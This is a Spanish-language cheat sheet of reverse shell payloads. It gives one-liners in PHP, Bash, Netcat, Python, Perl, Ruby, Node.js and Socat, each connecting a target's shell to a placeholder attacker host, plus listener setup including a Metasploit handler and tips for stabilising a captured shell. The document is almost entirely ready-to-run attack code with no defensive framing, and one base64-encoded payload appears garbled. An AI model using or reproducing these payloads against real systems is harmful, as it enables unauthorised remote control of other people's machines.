Reverse Shells
Reverse Shells
1. Introduccion
Las reverse shells permiten obtener acceso a un sistema mediante una conexion inversa iniciada desde el objetivo hacia el atacante. Son fundamentales en las fases de exploitation y post-exploitation.
2. PHP
2.1. Bash PHP
<?php exec("/bin/bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\""); ?>
2.2. PHP Base64
<?php $s=base64_decode('c2ggLWkgJiYgL2Rldi90Y3AvQUlQX1BPUlQvUE9SVCA+JjE=');system($s); ?>
2.3. PHP fsockopen
<?php
$ip = 'ATTACKER_IP';
$port = PORT;
$sh = fsockopen($ip,$port);
exec('/bin/sh -i <&3 >&3 2>&3');
?>
3. Bash
3.1. Bash Stdout
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
3.2. Bash con permisos
0<&196;exec 196<>/dev/tcp/ATTACKER_IP/PORT; bash <&196 >&196 2>&196
3.3. Bash desde /dev/tcp (solo bash)
exec /dev/tcp/ATTACKER_IP/PORT
4. Netcat
4.1. Netcat Clasico
nc -e /bin/bash ATTACKER_IP PORT
4.2. Netcat sin -e
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc ATTACKER_IP PORT > /tmp/f
4.3. Netcat con /dev/tcp
bash -c 'exec 5<>/dev/tcp/ATTACKER_IP/PORT; cat <&5 | while read line; do $line 2>&5 >&5; done'
5. Python
5.1. Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
5.2. Python con PTY
python3 -c "
import socket,os,pty;
s=socket.socket();
s.connect(('ATTACKER_IP',PORT));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn('/bin/bash')
"
6. Perl
perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
7. Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ATTACKER_IP","PORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
8. Node.js
(function(){
var net = require("net");
var cp = require("child_process");
var sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(PORT, "ATTACKER_IP", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})();
9. Socat
socat TCP:ATTACKER_IP:PORT EXEC:'bash -li',pty,stderr,sigint,setsid,sane
10. Mkfifo
rm /tmp/l; mkfifo /tmp/l; sh -i < /tmp/l 2>&1 | nc ATTACKER_IP PORT > /tmp/l
11. Estabilizacion
11.1. Upgrade a PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# or
script /dev/null
11.2. Control-Z y stty
# En tu terminal:
stty raw -echo
fg
reset
export TERM=xterm
stty rows 24 columns 80
12. Listener
# Netcat
nc -lnvp PORT
# Socat
socat TCP-LISTEN:PORT -
# Metasploit
use exploit/multi/handler
set payload linux/x64/shell/reverse_tcp
13. Configuracion Remota
13.1. Cambiar tamaño de terminal
stty -a # Ver valores actuales
stty rows 50 columns 200
13.2. Enviar desde archivo
echo "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" | base64
# Copiar y ejecutar en objetivo